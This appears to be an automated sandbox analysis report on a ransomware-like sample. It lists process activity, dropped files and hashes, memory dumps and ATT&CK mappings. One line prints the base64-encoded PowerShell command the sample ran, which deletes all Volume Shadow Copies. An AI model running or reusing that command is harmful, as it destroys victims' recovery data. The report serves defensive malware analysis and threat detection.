2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe

Suspicious use of SendNotifyMessage 42 IoCs

Processes:

taskmgr.exe

pid	process
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

xpsrchvw.exe

pid process

2676 xpsrchvw.exe
2676 xpsrchvw.exe
2676 xpsrchvw.exe
2676 xpsrchvw.exe

pid	process
2676	xpsrchvw.exe
2676	xpsrchvw.exe
2676	xpsrchvw.exe
2676	xpsrchvw.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe

description	pid	process	target process
PID 2624 wrote to memory of 2176	2624	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe	powershell.exe
PID 2624 wrote to memory of 2176	2624	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe	powershell.exe
PID 2624 wrote to memory of 2176	2624	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe	powershell.exe
PID 2624 wrote to memory of 2176	2624	d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe	powershell.exe

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Users\Admin\AppData\Local\Temp\d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe
"C:\Users\Admin\AppData\Local\Temp\d09338f3248b7c43b4c58274d453732fca910a0cee2ca50a2b72fe0364fb615c.exe"
1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\System32\xpsrchvw.exe
"C:\Windows\System32\xpsrchvw.exe" "C:\Users\Admin\Desktop\StopMeasure.easmx"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2676

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\TraceExpand.cmd" "
1⤵
PID:1592

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab3BAB.tmp
Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar40FB.tmp
Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\z935364-readme.txt
Filesize
6KB

MD5
5f25b9b7001e09518af9860a1d7dbbb5

SHA1
47f786c687f9804acd6577a96e435006446f2945

SHA256
f2cf8e51b4e8890177d317453d964867b13329e80ffe63494ff129012af0b283

SHA512
2b4ecae25ae1d4c230c626a3c281ca21ab33b7dac6a949dc9ebeb2534bbceae21fffad5860c1ca0d998cc6b50b2d262fa99d796abf7c44d172a2ebd112120e20

Download Submit
C:\Windows\System32\catroot2\dberr.txt
Filesize
194KB

MD5
e8ccda88bae6d643cb677b9eab01e0e9

SHA1
c892cfc4f1cf34554eeece3d94022659a1dd9732

SHA256
3cb7d1d3e98668afb8f3fce2e454142dd7be8126ae35dc07d18cd9e43044a0e7

SHA512
f96c1268f6464b89f30a0d12239a74526c7746b99cebeefb1fe5123c521924392f342f7c08f9d61ced26258c4083f97a15b67a2004d8073f81c09bbd71b914c2

Download Submit
memory/2000-673-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2000-671-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2000-678-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2000-677-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2000-676-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2000-675-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2000-674-0x00000000003A0000-0x00000000003A1000-memory.dmp

Filesize
4KB

Download
memory/2000-672-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2000-670-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2176-67-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

Filesize
9.6MB

Download
memory/2176-63-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

Filesize
9.6MB

Download
memory/2176-62-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2176-61-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2176-60-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2176-64-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2176-66-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

Filesize
9.6MB

Download
memory/2176-59-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

Filesize
9.6MB

Download
memory/2176-57-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

Filesize
2.9MB

Download
memory/2176-58-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/2676-65-0x0000000002E40000-0x0000000002E41000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads